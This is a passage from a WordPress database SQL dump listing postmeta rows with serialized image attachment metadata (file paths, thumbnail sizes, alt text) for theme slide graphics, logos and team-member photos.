p_attachment_metadata','a:5:{s:5:\"width\";i:439;s:6:\"height\";i:484;s:4:\"file\";s:31:\"2018/02/h2-slide3-graphic-3.png\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"h2-slide3-graphic-3-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"h2-slide3-graphic-3-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"h2-slide3-graphic-3-272x300.png\";s:5:\"width\";i:272;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"h2-slide3-graphic-3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"h2-slide3-graphic-3-439x300.png\";s:5:\"width\";i:439;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"h2-slide3-graphic-3-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"h2-slide3-graphic-3-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"h2-slide3-graphic-3-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2237,2540,'_wp_attachment_image_alt','o'),(2238,2541,'_wp_attached_file','2018/02/h2-slide3-graphic-4.png'),(2239,2541,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:167;s:6:\"height\";i:160;s:4:\"file\";s:31:\"2018/02/h2-slide3-graphic-4.png\";s:5:\"sizes\";a:3:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"h2-slide3-graphic-4-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"h2-slide3-graphic-4-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"h2-slide3-graphic-4-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2240,2541,'_wp_attachment_image_alt','o'),(2241,2542,'_wp_attached_file','2018/02/h2-slide3-graphic-5.png'),(2242,2542,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:390;s:6:\"height\";i:359;s:4:\"file\";s:31:\"2018/02/h2-slide3-graphic-5.png\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"h2-slide3-graphic-5-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"h2-slide3-graphic-5-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"h2-slide3-graphic-5-300x276.png\";s:5:\"width\";i:300;s:6:\"height\";i:276;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"h2-slide3-graphic-5-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"h2-slide3-graphic-5-390x300.png\";s:5:\"width\";i:390;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"h2-slide3-graphic-5-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"h2-slide3-graphic-5-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"h2-slide3-graphic-5-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2243,2542,'_wp_attachment_image_alt','o'),(2244,2544,'_wp_attached_file','2018/02/h3-slide3-graphic1.png'),(2245,2544,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:377;s:6:\"height\";i:584;s:4:\"file\";s:30:\"2018/02/h3-slide3-graphic1.png\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"h3-slide3-graphic1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide3-graphic1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"h3-slide3-graphic1-194x300.png\";s:5:\"width\";i:194;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide3-graphic1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"h3-slide3-graphic1-377x300.png\";s:5:\"width\";i:377;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"h3-slide3-graphic1-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"h3-slide3-graphic1-377x550.png\";s:5:\"width\";i:377;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"h3-slide3-graphic1-377x550.png\";s:5:\"width\";i:377;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"h3-slide3-graphic1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide3-graphic1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2246,2544,'_wp_attachment_image_alt','o'),(2247,2592,'_wp_attached_file','2018/02/h3-slide2-graphic2.png'),(2248,2592,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:174;s:6:\"height\";i:145;s:4:\"file\";s:30:\"2018/02/h3-slide2-graphic2.png\";s:5:\"sizes\";a:3:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide2-graphic2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide2-graphic2-150x145.png\";s:5:\"width\";i:150;s:6:\"height\";i:145;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide2-graphic2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2249,2592,'_wp_attachment_image_alt','o'),(2250,2612,'_wp_attached_file','2018/02/h3-slide2-graphic8.png'),(2251,2612,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:47;s:6:\"height\";i:58;s:4:\"file\";s:30:\"2018/02/h3-slide2-graphic8.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2252,2612,'_wp_attachment_image_alt','o'),(2253,2613,'_wp_attached_file','2018/02/h3-slide2-graphic9.png'),(2254,2613,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:76;s:6:\"height\";i:66;s:4:\"file\";s:30:\"2018/02/h3-slide2-graphic9.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2255,2613,'_wp_attachment_image_alt','o'),(2256,2742,'_wp_attached_file','2018/02/Logo-footer-smaller-350-x-1-1.png'),(2257,2742,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:350;s:6:\"height\";i:103;s:4:\"file\";s:41:\"2018/02/Logo-footer-smaller-350-x-1-1.png\";s:5:\"sizes\";a:7:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:41:\"Logo-footer-smaller-350-x-1-1-300x103.png\";s:5:\"width\";i:300;s:6:\"height\";i:103;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:41:\"Logo-footer-smaller-350-x-1-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"Logo-footer-smaller-350-x-1-1-300x88.png\";s:5:\"width\";i:300;s:6:\"height\";i:88;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:41:\"Logo-footer-smaller-350-x-1-1-150x103.png\";s:5:\"width\";i:150;s:6:\"height\";i:103;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:41:\"Logo-footer-smaller-350-x-1-1-300x103.png\";s:5:\"width\";i:300;s:6:\"height\";i:103;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:41:\"Logo-footer-smaller-350-x-1-1-300x103.png\";s:5:\"width\";i:300;s:6:\"height\";i:103;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:41:\"Logo-footer-smaller-350-x-1-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2258,2742,'_wp_attachment_image_alt','a'),(2259,2745,'_wp_attached_file','2018/02/Logo-New-TR-web.jpg'),(2260,2745,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1223;s:6:\"height\";i:360;s:4:\"file\";s:27:\"2018/02/Logo-New-TR-web.jpg\";s:5:\"sizes\";a:16:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:27:\"Logo-New-TR-web-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"Logo-New-TR-web-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:27:\"Logo-New-TR-web-600x177.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Logo-New-TR-web-300x88.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:88;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"Logo-New-TR-web-1024x301.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:301;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"Logo-New-TR-web-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"Logo-New-TR-web-768x226.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:226;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:27:\"Logo-New-TR-web-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:27:\"Logo-New-TR-web-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:27:\"Logo-New-TR-web-550x360.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:28:\"Logo-New-TR-web-1100x360.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:27:\"Logo-New-TR-web-550x360.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:28:\"Logo-New-TR-web-1100x360.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:27:\"Logo-New-TR-web-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:27:\"Logo-New-TR-web-600x177.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"Logo-New-TR-web-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(2261,2745,'_wp_attachment_image_alt','a'),(2262,2746,'_wp_attached_file','2018/02/logo-divided-sticky-img-1.png'),(2263,2746,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:720;s:6:\"height\";i:210;s:4:\"file\";s:37:\"2018/02/logo-divided-sticky-img-1.png\";s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:37:\"logo-divided-sticky-img-1-300x210.png\";s:5:\"width\";i:300;s:6:\"height\";i:210;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:37:\"logo-divided-sticky-img-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:37:\"logo-divided-sticky-img-1-600x175.png\";s:5:\"width\";i:600;s:6:\"height\";i:175;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"logo-divided-sticky-img-1-300x88.png\";s:5:\"width\";i:300;s:6:\"height\";i:88;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"logo-divided-sticky-img-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:37:\"logo-divided-sticky-img-1-630x210.png\";s:5:\"width\";i:630;s:6:\"height\";i:210;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:37:\"logo-divided-sticky-img-1-300x210.png\";s:5:\"width\";i:300;s:6:\"height\";i:210;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:37:\"logo-divided-sticky-img-1-550x210.png\";s:5:\"width\";i:550;s:6:\"height\";i:210;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:37:\"logo-divided-sticky-img-1-550x210.png\";s:5:\"width\";i:550;s:6:\"height\";i:210;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:37:\"logo-divided-sticky-img-1-300x210.png\";s:5:\"width\";i:300;s:6:\"height\";i:210;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:37:\"logo-divided-sticky-img-1-600x175.png\";s:5:\"width\";i:600;s:6:\"height\";i:175;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:37:\"logo-divided-sticky-img-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2264,2746,'_wp_attachment_image_alt','a'),(2265,2747,'_wp_attached_file','2018/01/team-member-1.jpg'),(2266,2747,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:25:\"2018/01/team-member-1.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"team-member-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"team-member-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:25:\"team-member-1-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"team-member-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"team-member-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"team-member-1-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:25:\"team-member-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:25:\"team-member-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:25:\"team-member-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:25:\"team-member-1-800x550.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:25:\"team-member-1-550x800.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:25:\"team-member-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"team-member-1-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"team-member-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2267,2747,'_wp_attachment_image_alt','a'),(2268,2748,'_wp_attached_file','2018/02/team-member-2.jpg'),(2269,2748,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:25:\"2018/02/team-member-2.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"team-member-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"team-member-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:25:\"team-member-2-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"team-member-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"team-member-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"team-member-2-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:25:\"team-member-2-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:25:\"team-member-2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:25:\"team-member-2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:25:\"team-member-2-800x550.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:25:\"team-member-2-550x800.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:25:\"team-member-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"team-member-2-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"team-member-2-100x100.